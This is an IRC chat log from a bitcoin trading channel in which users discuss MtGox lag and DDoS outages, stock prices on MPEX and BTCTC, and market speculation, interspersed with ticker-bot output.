it. Apr 04 12:51:33 did you read the articles in discussion ? Apr 04 12:51:58 nethash down 5% Apr 04 12:52:05 ;;goxlag Apr 04 12:52:05 How nice for you. No. How many trades per second was the DDoS able to generate, btw? Apr 04 12:52:06 MtGox lag is 40.399133 seconds. During this time, light travels 0.0809594102008 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 04 12:52:14 none, it being A DDOS. Apr 04 12:52:31 but seriously, please inform yourself before starting discussions, this is unseemly. Apr 04 12:52:32 ;;bc,stats Apr 04 12:52:34 DDoS against MtGox is a bit more sophisticated then. Apr 04 12:52:34 Current Blocks: 229633 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 190 blocks | Next Difficulty In About: 1 day, 3 hours, 18 minutes, and 19 seconds | Next Difficulty Estimate: 7785577.676 | Estimated Percent Change: 16.27508 Apr 04 12:52:47 http://trilema.com/mpex-ddosed-an-epic Apr 04 12:52:54 http://trilema.com/the-many-ways-available-for-talking-to-mpex Apr 04 12:52:57 that's a start. Apr 04 12:53:05 look around there, then we can talk more. Apr 04 12:53:37 and for the record, "mtgox ddos" is just mtgox crashing under sell pressure. Apr 04 12:53:54 which, i would hope, you've read the most recent trilema article on and know how it was arrived at and why. Apr 04 12:54:10 SDICE bids are way down, people are dumb Apr 04 12:54:22 but i'm enjoying it Apr 04 12:54:39 [MPEX] [S.MPOE] 18085 @ 0.00070861 = 12.8152 BTC [+] Apr 04 12:55:26 !ticker m s.dice Apr 04 12:55:28 [MPEX:S.DICE] 1D: 0.0031 / 0.00311313 / 0.0035 (389309 shares, 1,211.97 BTC), 7D: 0.0031 / 0.00320452 / 0.00439992 (1029516 shares, 3,299.11 BTC), 30D: 0.00300001 / 0.00375453 / 0.006 (1726765 shares, 6,483.20 BTC) Apr 04 12:55:38 heh. Apr 04 12:55:50 high bid is .00212 Apr 04 12:56:04 similar on PTs Apr 04 12:56:04 1k traded today wiped the bids ? Apr 04 12:56:07 $depth s.dice Apr 04 12:56:09 mircea_popescu: S.DICE Bids: ['5000 @ 0.00212', '4000 @ 0.002101', '7500 @ 0.00123', '600 @ 0.001002', '100 @ 0.00100121'] Apr 04 12:56:10 mircea_popescu: Asks: ['5291 @ 0.00333', '21363 @ 0.00333333', '700 @ 0.0035', '1500 @ 0.00389996', '29541 @ 0.00389997'] Apr 04 12:56:11 mircea_popescu: You should at leas try to inform yourself about the DDoS against MtGox before coming with uninformed nonsense "for the record". Apr 04 12:56:37 sturles anything speciffic ? Apr 04 12:58:15 see, that's the problem here. when i tell you you have to read up i give you what to read up. Apr 04 12:58:22 The pattern that has been repeated the last weeks is: DDoS starting against companies providing fast funding to MtGox, like Dwdolla, then a massive DDoS against MtGox, then only seconds later, massive selloff. Causing panic. Prolexis spends some time to mitigate the DDoS, and by then the panic is widespread. Apr 04 12:58:27 when you tell me to read up there's nothing there outside of very bad mtgox pr. Apr 04 12:58:51 except this is bull, but anyway. Apr 04 12:59:06 It is from the mouth of MagicalTux. Apr 04 12:59:14 Or keybopard. Apr 04 12:59:17 the Gox problems are good Apr 04 12:59:24 causes people to seek alternatives Apr 04 12:59:30 and Gox to man up Apr 04 12:59:35 maybe Apr 04 12:59:47 I hope they continue. I profit massively during panics. Apr 04 12:59:56 more power to you. Apr 04 13:00:30 As long as they continue, I will be using MtGox. Hmm. Perhaps it is actually good for their business.. Apr 04 13:00:59 people's rationale usually tends to lean toward where their profit is Apr 04 13:01:18 everyone that owns possibly too much asicminer stock, says "its underpriced!" Apr 04 13:01:42 if they sold too early "its overpriced!" Apr 04 13:01:56 and if they happen to be used to something "it's great" Apr 04 13:02:01 right Apr 04 13:02:05 and if they're too lazy to read on something else "it's bad" Apr 04 13:02:13 mmhm Apr 04 13:02:15 and on and on. sure. intellectual lazyness is the main driver of human behaviour. Apr 04 13:02:59 but that aside, mtgox has been bleeding marketshare since late 2011 Apr 04 13:03:07 strictly for being inept in pretty much every aspect. Apr 04 13:03:14 i wouldn't count on them being around much longer. Apr 04 13:04:11 they will probably flail with some ugly moves before letting go of this cash cow Apr 04 13:04:32 yeah well... Apr 04 13:04:48 but let's be optiomistic : they've been given a boon these coupla months Apr 04 13:04:55 maybe they know what to do with it and reinvent themselves. Apr 04 13:05:05 like adding litecoin? Apr 04 13:05:06 hehe Apr 04 13:05:18 it's all spelled out for them, they can just steal it uncredited like before for all i care. Apr 04 13:06:04 [HAVELOCK] [VTX] 1 @ 0.39 BTC [-] Apr 04 13:06:05 [HAVELOCK] [VTX] 1 @ 0.38 BTC [-] Apr 04 13:06:06 [HAVELOCK] [VTX] 3 @ 0.37 = 1.11 BTC [-] Apr 04 13:24:20 $avg Apr 04 13:24:21 ThickAsThieves: 127.34 Apr 04 13:25:44 bitcoin has been stable for the past 24 hours gasp Apr 04 13:25:55 thank god for another shitstorm on gox Apr 04 13:35:06 ;;goxlag Apr 04 13:35:07 MtGox lag is 0.056398 seconds. During this time, light travels 0.000113020960537 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 04 13:35:11 ! Apr 04 13:35:18 ;;ticker Apr 04 13:35:18 BTCUSD ticker | Best bid: 133.14634, Best ask: 133.19999, Bid-ask spread: 0.05365, Last trade: 133.20000, 24 hour volume: 119965.62436588, 24 hour low: 110.00000, 24 hour high: 142.00000, 24 hour vwap: 127.58826 Apr 04 13:35:35 i'm amazed that after all that the price held Apr 04 13:35:57 why ? Apr 04 13:36:22 kinda had a feeling that the run up was caused by gox lag entirely Apr 04 13:36:36 and might be artificial Apr 04 13:36:38 nah, it was all the press. Apr 04 13:36:40 12K in mt gox queue Apr 04 13:37:03 are you serious Apr 04 13:37:25 12000? Apr 04 13:37:42 where do i check that info again? Apr 04 13:38:02 i guess in the scheme of things its not a lot of people Apr 04 13:38:08 but its a lot more than usual Apr 04 13:38:24 rumour info, its what people report when they are in the queue Apr 04 13:38:34 ah Apr 04 13:39:22 also via fb : Last year, Mt.Gox saw an average of 9,000 to 10,000 new accounts created every month. This number doubled in January, tripled in February, and sextupled in March. In this month alone, over 57,000 new accounts were created! Apr 04 13:39:52 decentralize my ass Apr 04 13:41:44 hi all Apr 04 13:42:04 anyone read gox's latest statement? Apr 04 13:42:16 [MPEX] [O.USD.C167N] 3 @ 0.32508438 = 0.9753 BTC Apr 04 13:43:06 The N options just turn into T's at the end of the month, correct? Apr 04 13:44:08 (for owner) Apr 04 13:50:57 MJR_, yes and MP wrote a post about it http://trilema.com/2013/its-been-an-epic-few-days-what-happened/ Apr 04 13:51:49 ;;ticker Apr 04 13:51:52 BTCUSD ticker | Best bid: 133.10000, Best ask: 133.15000, Bid-ask spread: 0.05000, Last trade: 133.15000, 24 hour volume: 119390.78497527, 24 hour low: 110.00000, 24 hour high: 142.00000, 24 hour vwap: 127.53063 Apr 04 13:52:21 cool thanks...i was just going to point out the one pertinent fact Apr 04 13:52:28 5700 new accounts in march a new record Apr 04 13:52:33 current queue at 12600 Apr 04 13:54:03 57000* i guess Apr 04 13:54:24 the pertinent fact is slightly in between the lines. The statement doesn't quite instill confidence. Apr 04 13:55:27 please explain Apr 04 13:55:49 if i have old account but never verified will i float to the top Apr 04 13:55:53 ya think? Apr 04 13:56:06 whats up MJR Apr 04 13:56:45 well, i am not talking about gox Apr 04 13:56:59 i don't care, i've never traded there and we all know they suck...let's move on to the next topic Apr 04 13:57:04 which would be increased adoption Apr 04 13:57:34 new accounts opened is a good metric for how much it's growing Apr 04 13:58:08 but I also thought that it was hilarious that they said "All exchanges suffer from lag"...yeah and we measure it in microseconds Apr 04 13:58:15 not minutes Apr 04 14:07:58 ThickAsThieves yes, n turns to t Apr 04 14:08:19 i highly doubt other exchanges would be prepared for such a DDoS. The issue is that people using other exchanges would make the target less obvious Apr 04 14:08:45 gesell this is a solved problem. Apr 04 14:08:54 have trade engine separate from broker/website, Apr 04 14:09:01 use distributed methods to diffuse ddos. Apr 04 14:09:57 yeah was also thinking about this but I guess it depends on the nature of the DDoS. If it is similar to that used against spamhaus a few weeks ago... the attacker could still induce panic by attacking the website and read only API to get ticker Apr 04 14:10:31 again : Apr 04 14:10:36 you have the trade engine separate Apr 04 14:10:36 but in general spreading out the interfaces over different hauls could help, while also adding a lot of complexity Apr 04 14:10:41 you can make one broker website per datacenter Apr 04 14:10:43 i just aknowledge that Apr 04 14:10:48 a ok Apr 04 14:11:00 i think im getting a little frazzled i've been doing nothing but explaining this for the past 3 hours Apr 04 14:11:17 did you read about the DDoS against spamhaus? Apr 04 14:11:21 yeah Apr 04 14:11:37 MJR_> but I also thought that it was hilarious that they said "All exchanges suffer from lag"...yeah and we measure it in microseconds << just had this discussion above, was explaining how six promises 37 microsecond delay Apr 04 14:12:10 btct.co working? Apr 04 14:12:57 ;;asks147 Apr 04 14:12:58 Error: "asks147" is not a valid command. Apr 04 14:13:06 ;;asks 147 Apr 04 14:13:08 There are currently 11713.428 bitcoins offered at or under 147.0 USD, worth 1658048.18491 USD in total. | Data vintage: 0.0017 seconds Apr 04 14:16:50 MJR_: MtGox reports lag in microseconds as well. I have been logging every minute for a while, and the most common value is 0. On a normal day with just a few standard DDoS attacks, it is above 1 second a few times every hour. Apr 04 14:17:10 i don't recall mtgoxlag under 1 Apr 04 14:17:14 ;;goxlag Apr 04 14:17:15 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 04 14:17:20 hey. Apr 04 14:17:21 Heh. :-) Apr 04 14:17:44 btct.co is fail for me, they being ddosed? Apr 04 14:18:00 SIX doesn't provide API access to the entire internet. Can't compare it. Apr 04 14:18:09 mtgox 10.84 a few seconds ago 133.50 Apr 04 14:18:09 mtgox 0.08 a minute ago 133.33 Apr 04 14:18:09 mtgox 5.12 4 minutes ago 133.50 Apr 04 14:18:09 mtgox 48.50 7 minutes ago 133.30 Apr 04 14:18:09 mtgox 0.25 7 minutes ago 133.00 Apr 04 14:18:40 is that a full list of the last trades ? Apr 04 14:18:59 Where is it from? Apr 04 14:19:04 yeah it looks like no one can make trades Apr 04 14:19:09 bitcoinity Apr 04 14:19:17 or no one is for whatever reason, Apr 04 14:19:40 ChaangNoi http://btct.co/ doesn't load here. do i have the wrong url ? Apr 04 14:19:56 its one of the exchanges Apr 04 14:19:56 its down Apr 04 14:20:02 as is litecoinglobal.com Apr 04 14:20:03 the stock exchanges Apr 04 14:20:09 hmm Apr 04 14:20:12 heh. Apr 04 14:20:15 both burnside's sites Apr 04 14:20:23 this has happened before Apr 04 14:20:24 mircea_popescu: Doesn't look like it. Seems to be USD only. Much of the trading on MtGox is in other currencies. Apr 04 14:20:26 yeah, i was just trying ot take out money lol Apr 04 14:20:30 he's probably rebooting or something Apr 04 14:20:31 so let's see : the part where i say "attacker has found his weak spot, moves on" is pretty accurate. Apr 04 14:20:43 now the part where mtgox comes out with self congratulatory bit remains. Apr 04 14:20:47 maybe adding a feature Apr 04 14:20:50 ok Apr 04 14:21:09 maybe stealing your money Apr 04 14:21:12 :) Apr 04 14:21:21 ThickAsThieves i'll bet its ddos Apr 04 14:21:26 sturles most of their volume is usd. Apr 04 14:21:29 seems like its back Apr 04 14:22:10 i still don't see it Apr 04 14:22:26 mircea_popescu: Yes, many trades are mix-trades between e.g. EUR and USD. And most other currency trades are low in volume. Apr 04 14:22:40 lol worked until i wanted to take out money, broke again Apr 04 14:22:52 sturles i dunno what mix trades means there. Apr 04 14:23:06 The other currency order books are also stuffed with lots and lots of 0.01235 orders. Which makes many trades for just one coin. Apr 04 14:23:30 A mix trade is where an order in one currency was matched with an order in another currency. Apr 04 14:24:33 [BTCTC] [ASICMINER-PT] 1 @ 0.75679 BTC [-] Apr 04 14:24:41 [BTCTC] [ASICMINER-PT] 1 @ 0.7568 BTC [+] Apr 04 14:24:45 [BTCTC] [ASICMINER-PT] 6 @ 0.756899 = 4.5414 BTC [+] Apr 04 14:25:21 i still don't grasp why you imagine this'd make a difference. Apr 04 14:25:29 Also note that many sites reporting MtGox trades aggregates many small trades into one report. Like this example from #bitcoin-market: Apr 04 14:25:32 13:24 <+amphipod> Apr04 11:24:18 mtgox x11 28.8811 @ 133.42578222 USD Apr 04 14:26:04 11 trades making up a total 28.8811 BTC at the average price of 133.42578222 USD. Apr 04 14:26:22 yeah. Apr 04 14:26:37 so find me a space where that bot reports > 100 trades a minute. Apr 04 14:26:40 16 order books to check instad of one. Why would that make 0 difference? Apr 04 14:26:43 [BTCTC] [BITVPS] 1 @ 0.00301 BTC [+] Apr 04 14:26:55 ... Apr 04 14:27:13 this is like saying querying 5000 records is not the same thing as querying 5000 records. Apr 04 14:27:22 either you don't at all understand the topic or are trolling me. Apr 04 14:28:29 [BTCTC] [ASICMINER-PT] 2 @ 0.757 = 1.514 BTC [+] Apr 04 14:28:40 gox lag is back up Apr 04 14:28:57 ;;goxlag Apr 04 14:28:57 MtGox lag is 37.58024 seconds. During this time, light travels 0.0753103801907 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 04 14:29:42 10:31 <+amphipod> Apr04 08:29:07 mtgox x149 555.6407 @ 133.52494269 USD Apr 04 14:29:51 Several other trades during the same minute. Apr 04 14:30:12 well the 0 lag was nice while it lasted. Apr 04 14:30:35 sturles a little more than just the one line if you don't mind Apr 04 14:31:09 Join the channel youself if you care so much. Apr 04 14:31:35 i am trying to help you structure your own argument. Apr 04 14:31:48 i care not at all otherwise. Apr 04 14:32:09 Why should I quote more? There are more than 100 right there. And I tild you there were trades before and after during the same minute. Apr 04 14:32:54 But because #bitcoin-market reports trades from most exchanges, there are several unimpoprtant lines in between. Apr 04 14:33:26 because the aggregated set would logically be from between the previous and the next report Apr 04 14:33:36 and so it's prbably the bot aggregated 149 trades over 5 minutes or something Apr 04 14:34:06 No, I told you, there were otehr (aggregated) trades reported in the same minute, before and after. Apr 04 14:34:38 I'm not going to paste everything here. Will get dropped for flooding. Apr 04 14:35:01 Just join the channel to see for yourself. Apr 04 14:35:20 mk Apr 04 14:38:19 why is the ATH being reported as 142 Apr 04 14:38:22 wasnt it 147? Apr 04 14:40:19 because they dunno what they're doing Apr 04 14:45:27 ;;ticker Apr 04 14:45:28 BTCUSD ticker | Best bid: 135.90500, Best ask: 136.00000, Bid-ask spread: 0.09500, Last trade: 136.00000, 24 hour volume: 115725.71210364, 24 hour low: 110.00000, 24 hour high: 142.00000, 24 hour vwap: 127.07562 Apr 04 14:46:10 was the ATH less than 24 hrs ago? Apr 04 14:46:18 bc 147 was 27h ago Apr 04 14:46:24 sh Apr 04 14:46:28 ah Apr 04 14:46:30 oh Apr 04 14:46:33 :) Apr 04 14:47:29 ;;goxlag Apr 04 14:47:30 MtGox lag is 26.943103 seconds. During this time, light travels 0.053993676742 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). Apr 04 14:48:02 [BTCTC] [BITVPS] 1 @ 0.00479 BTC [+] Apr 04 14:49:57 [BTCTC] [S.DICE-PT] 1 @ 0.00475 BTC [+] Apr 04 14:52:28 [BTCTC] [S.MPOE-PT] 20 @ 0.000657 = 0.0131 BTC [-] Apr 04 14:52:55 ;;nethash Apr 04 14:52:56 59843.2905525 Apr 04 14:52:59 ;;estimate Apr 04 14:53:00 Next difficulty estimate | 7779848.36874 based on data since last change | 8359883.55097 based on data for last three days Apr 04 14:53:30 need more hashing Apr 04 14:54:29 [MPEX] [S.MPOE] 4125 @ 0.00069631 = 2.8723 BTC [-] Apr 04 14:55:10 [BTCTC] [S.DICE-PT] 13 @ 0.00475 = 0.0618 BTC [+] Apr 04 14:56:27 sturles, highest mpex trade spike i have recorded in live.coinbr records is 100 trades/5 seconds on BitBet IPO Apr 04 14:57:00 there was no noticeable lag at all, coinbr users ninja-inserted orders in the middle of it Apr 04 14:57:06 [BTCTC] [S.DICE-PT] 88 @ 0.00401 = 0.3529 BTC [-] Apr 04 14:57:08 [BTCTC] [S.DICE-PT] 1 @ 0.0038 BTC [-] Apr 04 14:57:20 ninjas, the missing ingredient Apr 04 14:57:55 and there was certainly 1000 orders arriving/cancelled during that time Apr 04 14:58:11 don't tell me mtgox can do this Apr 04 14:59:23 Ddos attak :( Apr 04 14:59:31 ;;goxlag Apr 04 14:59:31 MtGox lag is 83.288833 seconds. During this time, light travels 0.166909888784 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 04 14:59:52 who is next line after Gox? Apr 04 14:59:56 [BTCTC] [S.DICE-PT] 100 @ 0.00315 = 0.315 BTC [-] Apr 04 14:59:58 in Apr 04 15:00:07 i just received a business inquiry...the email was in comic sans Apr 04 15:00:16 srs bsns Apr 04 15:00:22 i know Apr 04 15:00:22 [BTCTC] [S.DICE-PT] 11 @ 0.00315 = 0.0347 BTC [-] Apr 04 15:00:32 i'm like...is this your first time using a keyboard? Apr 04 15:02:40 I taught someone that has been using Windows for at least 10 years how to Alt-Tab the other day. "I need to hang around you more often!" Apr 04 15:07:19 https://bitcointalk.org/index.php?topic=166397.0 I wonder what they say to these guys inquiring about investing millions in bitcoins Apr 04 15:07:47 "sorry sir, that's too many bitcoins, you'd break the system" Apr 04 15:08:48 btc at 500$ before summer ? Apr 04 15:09:01 i hope so/not Apr 04 15:09:21 same :D Apr 04 15:10:16 jasmine tea and fresghly baked chocolate muffins. life sux dunnit. Apr 04 15:10:57 [MPEX] [S.MPOE] 4518 @ 0.0006928 = 3.1301 BTC [-] Apr 04 15:10:59 [MPEX] [S.MPOE] 2924 @ 0.00069168 = 2.0225 BTC [-] Apr 04 15:11:01 [MPEX] [S.MPOE] 2508 @ 0.00069137 = 1.734 BTC [-] Apr 04 15:11:06 i got some nice jasmine tea recently, the fancy kind you put in a metal ball :) Apr 04 15:11:16 yeah Apr 04 15:11:30 there's this little shop just opened, very good quality stuffs. Apr 04 15:15:01 ThickAsThieves don't believe everything you read in the newspapers btw. Apr 04 15:15:11 20 calls a day for 100mn each ? 2bn a day ? yeah. right. Apr 04 15:15:23 my coworker gets me green tea from taiwan Apr 04 15:15:24 its good Apr 04 15:16:02 ThickAsThieves: lol...its crazy when you hang out with people who understand computers and then get confronted with "can we just make all of them blue" (select all) Apr 04 15:20:26 casascius: Thanks for the excellent feedback. Apr 04 15:20:26 mpoe-pr: If this is excellent I bet nobody eats what you cook. Apr 04 15:20:57 http://bou.si/pic/where-it-belongs.jpg Apr 04 15:24:17 mp : i guess is 20 calls a day for a total 100M$, i want belive hehe Apr 04 15:24:36 still pocket change for big player Apr 04 15:27:29 [MPEX] [S.MPOE] 8486 @ 0.00069365 = 5.8863 BTC [+] Apr 04 15:29:13 oh i didnt actually believe people wanna invest 100m Apr 04 15:29:21 just playing along :) Apr 04 15:31:23 OJ to pump $1.4 trillion into economy Apr 04 15:31:36 aand here i am trying to keep things civil ;/ Apr 04 15:31:48 error4733 yeah bullcrap. Apr 04 15:32:13 there's not that many funds that have the sort of capital that'd allow them tio place 100mn into exotic weird thing, and also have the rifght profile. Apr 04 15:32:26 none of them are calling unheard of whoever that guy is cause i don't know him Apr 04 15:32:52 basically the media has turned into a sort of massive reddit, buncha people trying to perch themselves into the stratosphere Apr 04 15:34:24 usualy i bet a good dinner in this case but roumania is to far if i win Apr 04 15:34:50 mircea_popescu: on that last point, i agree Apr 04 15:35:44 error4733 what're we betting ? Apr 04 15:36:23 no big player for 100M$+ before summer Apr 04 15:37:17 let's do some math. Apr 04 15:37:21 ;;ticker Apr 04 15:37:22 BTCUSD ticker | Best bid: 137.60001, Best ask: 137.99999, Bid-ask spread: 0.39998, Last trade: 137.99999, 24 hour volume: 115568.41634731, 24 hour low: 110.00000, 24 hour high: 142.00000, 24 hour vwap: 127.02546 Apr 04 15:37:27 !ticker m s.dice Apr 04 15:37:29 [MPEX:S.DICE] 1D: 0.0031 / 0.00311313 / 0.0035 (389309 shares, 1,211.97 BTC), 7D: 0.0031 / 0.00320452 / 0.00439992 (1029516 shares, 3,299.11 BTC), 30D: 0.00300001 / 0.00375305 / 0.006 (1725125 shares, 6,474.50 BTC) Apr 04 15:37:42 ;;calc .13 * 311313 * 127.02546 Apr 04 15:37:42 5140808.01377 Apr 04 15:38:03 so that's about 5mn worth of outstanding s.dice stock. about the same worth of s.mpoe. Apr 04 15:38:12 what's your 100mn guy to do, buy bitcoins and hold them ? Apr 04 15:40:43 ;;market buy 25000 Apr 04 15:40:45 A market order to buy 25000 bitcoins right now would take 3717531.0041 USD and would take the last price up to 169.9000 USD, resulting in an average price of 148.7012 USD/BTC. | Data vintage: 0.0014 seconds Apr 04 15:40:56 ;;market buy 100000 Apr 04 15:40:56 This order would exceed the size of the order book. You would buy 55695.451 bitcoins, for a total of 14145613197667.5664 USD and take the price to 9999999999998.9004. | Data vintage: 11.2836 seconds Apr 04 15:41:13 ;;market buy 50000 Apr 04 15:41:13 A market order to buy 50000 bitcoins right now would take 14003105.1552 USD and would take the last price up to 1365.0843 USD, resulting in an average price of 280.0621 USD/BTC. | Data vintage: 27.9421 seconds Apr 04 15:41:30 ;;market buy 75000 Apr 04 15:41:31 This order would exceed the size of the order book. You would buy 55695.451 bitcoins, for a total of 14145613197667.5664 USD and take the price to 9999999999998.9004. | Data vintage: 45.4887 seconds Apr 04 15:41:40 hehe Apr 04 15:41:52 simply not enough bitcoins for $100m Apr 04 15:43:14 besides, if you have a fund that sorta-fits the profile (exotic/emergent money market) Apr 04 15:43:21 and 1bn+ under management Apr 04 15:43:34 you may risk as much as 1-2mn. maybe 10mn if you're really huge. Apr 04 15:44:11 1m i could see Apr 04 15:44:35 https://www.muckrock.com/foi/united-states-of-america-10/bitcoin-and-silk-road-1385/#396095-acknowledgement-letter Apr 04 15:45:30 interesting Apr 04 15:45:41 old Apr 04 15:46:00 ya, just... no answer. Apr 04 15:46:48 they just keep giving the same answer Apr 04 15:46:56 what are their obligations? Apr 04 15:48:04 i never followed the foia stuffi n the us Apr 04 15:52:41 [BTCTC] [BASIC-MINING] 5 @ 0.38 = 1.9 BTC [+] Apr 04 15:54:29 re Apr 04 16:02:41 [BTCTC] [ASICMINER-PT] 3 @ 0.7568 = 2.2704 BTC [-] Apr 04 16:05:17 http://arstechnica.com/gadgets/2013/03/bullseye-from-1000-yards-shooting-the-17000-linux-powered-rifle/ Apr 04 16:06:37 [BTCTC] [BASIC-MINING] 2 @ 0.39 = 0.78 BTC [+] Apr 04 16:12:59 ;;ticker Apr 04 16:12:59 BTCUSD ticker | Best bid: 140.80000, Best ask: 141.00000, Bid-ask spread: 0.20000, Last trade: 140.80000, 24 hour volume: 121358.82585477, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.64149 Apr 04 16:13:01 ;;goxlag Apr 04 16:13:02 MtGox lag is 23.416337 seconds. During this time, light travels 0.0469260771656 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 04 16:13:08 $avg Apr 04 16:13:16 ThickAsThieves: 127.43 Apr 04 16:16:03 it boggles me how the heck did sturles manage to reference gox lag the ONE TIME in the past... um... 6 months ?! Apr 04 16:16:09 when it wasn;t like 20-2000 seconds Apr 04 16:19:11 [BTCTC] [SYNERGY] 1 @ 0.01998 BTC [+] Apr 04 16:19:40 hehe Apr 04 16:19:43 ;;goxlag Apr 04 16:19:43 MtGox lag is 23.913118 seconds. During this time, light travels 0.0479216207274 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). Apr 04 16:31:42 topace: any word on rebroadcasting those transactions? Apr 04 16:34:40 i have a withdrawal in limbo from havelock :/ Apr 04 16:34:55 pm Apr 04 16:35:05 pm'd topace earlier no response yet Apr 04 16:35:07 ;;goxlag Apr 04 16:35:08 MtGox lag is 0.076872 seconds. During this time, light travels 0.000154050627298 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 04 16:35:21 sturles controls goxlag! Apr 04 16:35:47 Not really. You probably don't check it unless you know it is high. Apr 04 16:36:29 i check it whenever i wanna get the ticker these days Apr 04 16:36:34 ;;ticker Apr 04 16:36:35 BTCUSD ticker | Best bid: 138.66502, Best ask: 138.99998, Bid-ask spread: 0.33496, Last trade: 138.66500, 24 hour volume: 122517.04310522, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.75884 Apr 04 16:39:51 [MPEX] [S.DICE] 273 @ 0.0032999 = 0.9009 BTC [-] Apr 04 16:39:54 does anybody know why the S.DICE stock keeps dropping? Apr 04 16:40:24 because people keep selling Apr 04 16:40:31 I know this month won't be much in dividend, but is there something else going on? Apr 04 16:40:37 really? :) Apr 04 16:40:42 :) Apr 04 16:40:59 i think that many people didnt realize there was no profit yet Apr 04 16:41:03 Erik didn't run off to Belize or something? Apr 04 16:41:10 some still might not Apr 04 16:41:13 no Apr 04 16:41:24 alright thanks Apr 04 16:41:32 once divs and report are issued that will be real test of price Apr 04 16:41:36 btc rally kill S.dice Apr 04 16:41:43 that also, Apr 04 16:41:47 people that wanna cash out Apr 04 16:41:51 need to sell their stocks Apr 04 16:41:51 yeah isn't the report overdue? Apr 04 16:41:55 x11 since january Apr 04 16:42:04 that could also explain Apr 04 16:42:20 report is due by tomorrow Apr 04 16:42:29 real value of s.dice didnt increase that much Apr 04 16:42:31 panic usually results in loss Apr 04 16:42:36 [MPEX] [S.MPOE] 8743 @ 0.00069365 = 6.0646 BTC [+] Apr 04 16:42:38 [MPEX] [S.MPOE] 9157 @ 0.00069803 = 6.3919 BTC [+] Apr 04 16:42:40 it's a loss Apr 04 16:42:42 but real value of sdice hasn't dropped Apr 04 16:42:52 and its a great company Apr 04 16:42:53 i sold.. because i didnt want lose any BTC Apr 04 16:43:06 I don't see how a casino can go that wrong Apr 04 16:43:11 seems like a low risk investment Apr 04 16:43:11 yes but not x11 in 3 month Apr 04 16:43:14 error who are you? why not fix your username Apr 04 16:43:25 it hasn't really gone wrong Apr 04 16:43:27 or is that real? Apr 04 16:43:29 over time it will even out Apr 04 16:43:32 its real Apr 04 16:43:34 indeed Apr 04 16:43:35 ah Apr 04 16:43:38 yeah isn't the report overdue? << should be today or tomorrow. Apr 04 16:43:40 they had one month where a couple of bit losses hit Apr 04 16:43:57 yeah even the house loses sometimes Apr 04 16:44:02 in my opinion Sdice is worth no less than when it was trading at .007 Apr 04 16:44:03 over time that compensates Apr 04 16:44:28 exactly Apr 04 16:44:32 surely erik will have developments soon Apr 04 16:44:44 he did announce that on the forum Apr 04 16:44:48 we didnt talk about losse or wining, if btc was at 13$, i dont care about a shitty div Apr 04 16:44:55 one month Apr 04 16:44:57 when it comes to gambling, people still think in fiat terms... Apr 04 16:45:10 her i talk about S.dice marketcap Apr 04 16:46:03 its not impossible for sdice to lower bid limit Apr 04 16:46:13 what is is now - $50MM now? Apr 04 16:46:27 about. Apr 04 16:46:40 how about MPOE? $75MM? Apr 04 16:48:10 over 100 Apr 04 16:48:18 !ticker m s.mpoe Apr 04 16:48:20 [MPEX:S.MPOE] 1D: 0.00067393 / 0.00069724 / 0.00070861 (286436 shares, 199.71 BTC), 7D: 0.00059218 / 0.00066086 / 0.00070861 (2774297 shares, 1,833.43 BTC), 30D: 0.00059218 / 0.00071925 / 0.00077505 (16002312 shares, 11,509.74 BTC) Apr 04 16:48:28 ;;ticker Apr 04 16:48:29 BTCUSD ticker | Best bid: 138.15000, Best ask: 138.70000, Bid-ask spread: 0.55000, Last trade: 138.00000, 24 hour volume: 122772.25005439, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.78223 Apr 04 16:48:43 ;;calc 719250 * 138 Apr 04 16:48:43 99256500 Apr 04 16:48:48 or just a little under. Apr 04 16:49:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7567 BTC [-] Apr 04 16:49:37 [BTCTC] [ASICMINER-PT] 1 @ 0.7568 BTC [+] Apr 04 16:49:40 [BTCTC] [ASICMINER-PT] 8 @ 0.757 = 6.056 BTC [+] Apr 04 16:51:00 http://www.cnbc.com/id/100615508 Apr 04 16:51:01 heh Apr 04 16:51:25 interesting contrast - SDICE and MPOE - in terms of USD/BTC elasticity... Apr 04 16:51:37 i see btc at 500$ in no time, S.dice just can worth 250m$, so it's a quick calcul, it's better for me to cashout Apr 04 16:51:50 cant* Apr 04 16:55:01 [BTCTC] [GSDPT] 1 @ 0.00358 BTC [+] Apr 04 16:55:05 [BTCTC] [GSDPT] 23 @ 0.00359 = 0.0826 BTC [+] Apr 04 16:55:11 [BTCTC] [GSDPT] 55 @ 0.00368 = 0.2024 BTC [+] Apr 04 16:55:16 [BTCTC] [GSDPT] 1 @ 0.00367 BTC [-] Apr 04 16:56:05 [HAVELOCK] [SDICE] 1 @ 0.33999999 BTC [+] Apr 04 16:56:31 [BTCTC] [GSDPT] 570 @ 0.0037 = 2.109 BTC [+] Apr 04 16:56:44 somebosy just wished me happy 404 day... Apr 04 16:56:49 somebody Apr 04 16:57:15 [MPEX] [S.DICE] 570 @ 0.00333 = 1.8981 BTC [+] Apr 04 16:57:21 what is this world coming to? Apr 04 16:57:22 happy 404 day Apr 04 16:58:03 [HAVELOCK] [KCIM] 1 @ 1.1 BTC [-] Apr 04 16:58:36 you know what is the worst, when you use your Kuerig for how water for your tea, but someone left a coffee k-cup inside Apr 04 16:58:44 end up with nasty coftea Apr 04 16:59:43 error4733 sorry but 500 ain't happening Apr 04 16:59:46 not in no time. Apr 04 17:00:44 not in no time = in time Apr 04 17:01:34 right. Apr 04 17:03:33 yes, i'm sure you told me that for 150 back in january (btc@13$) Apr 04 17:04:34 quote me ? Apr 04 17:04:58 just kididng Apr 04 17:07:08 but srsly x11 in 3 month, why not x3 before summer ? Apr 04 17:08:06 when is summer June 20? Apr 04 17:08:11 i forget Apr 04 17:08:33 certainly possible, but I wouldn't be cheering for it... 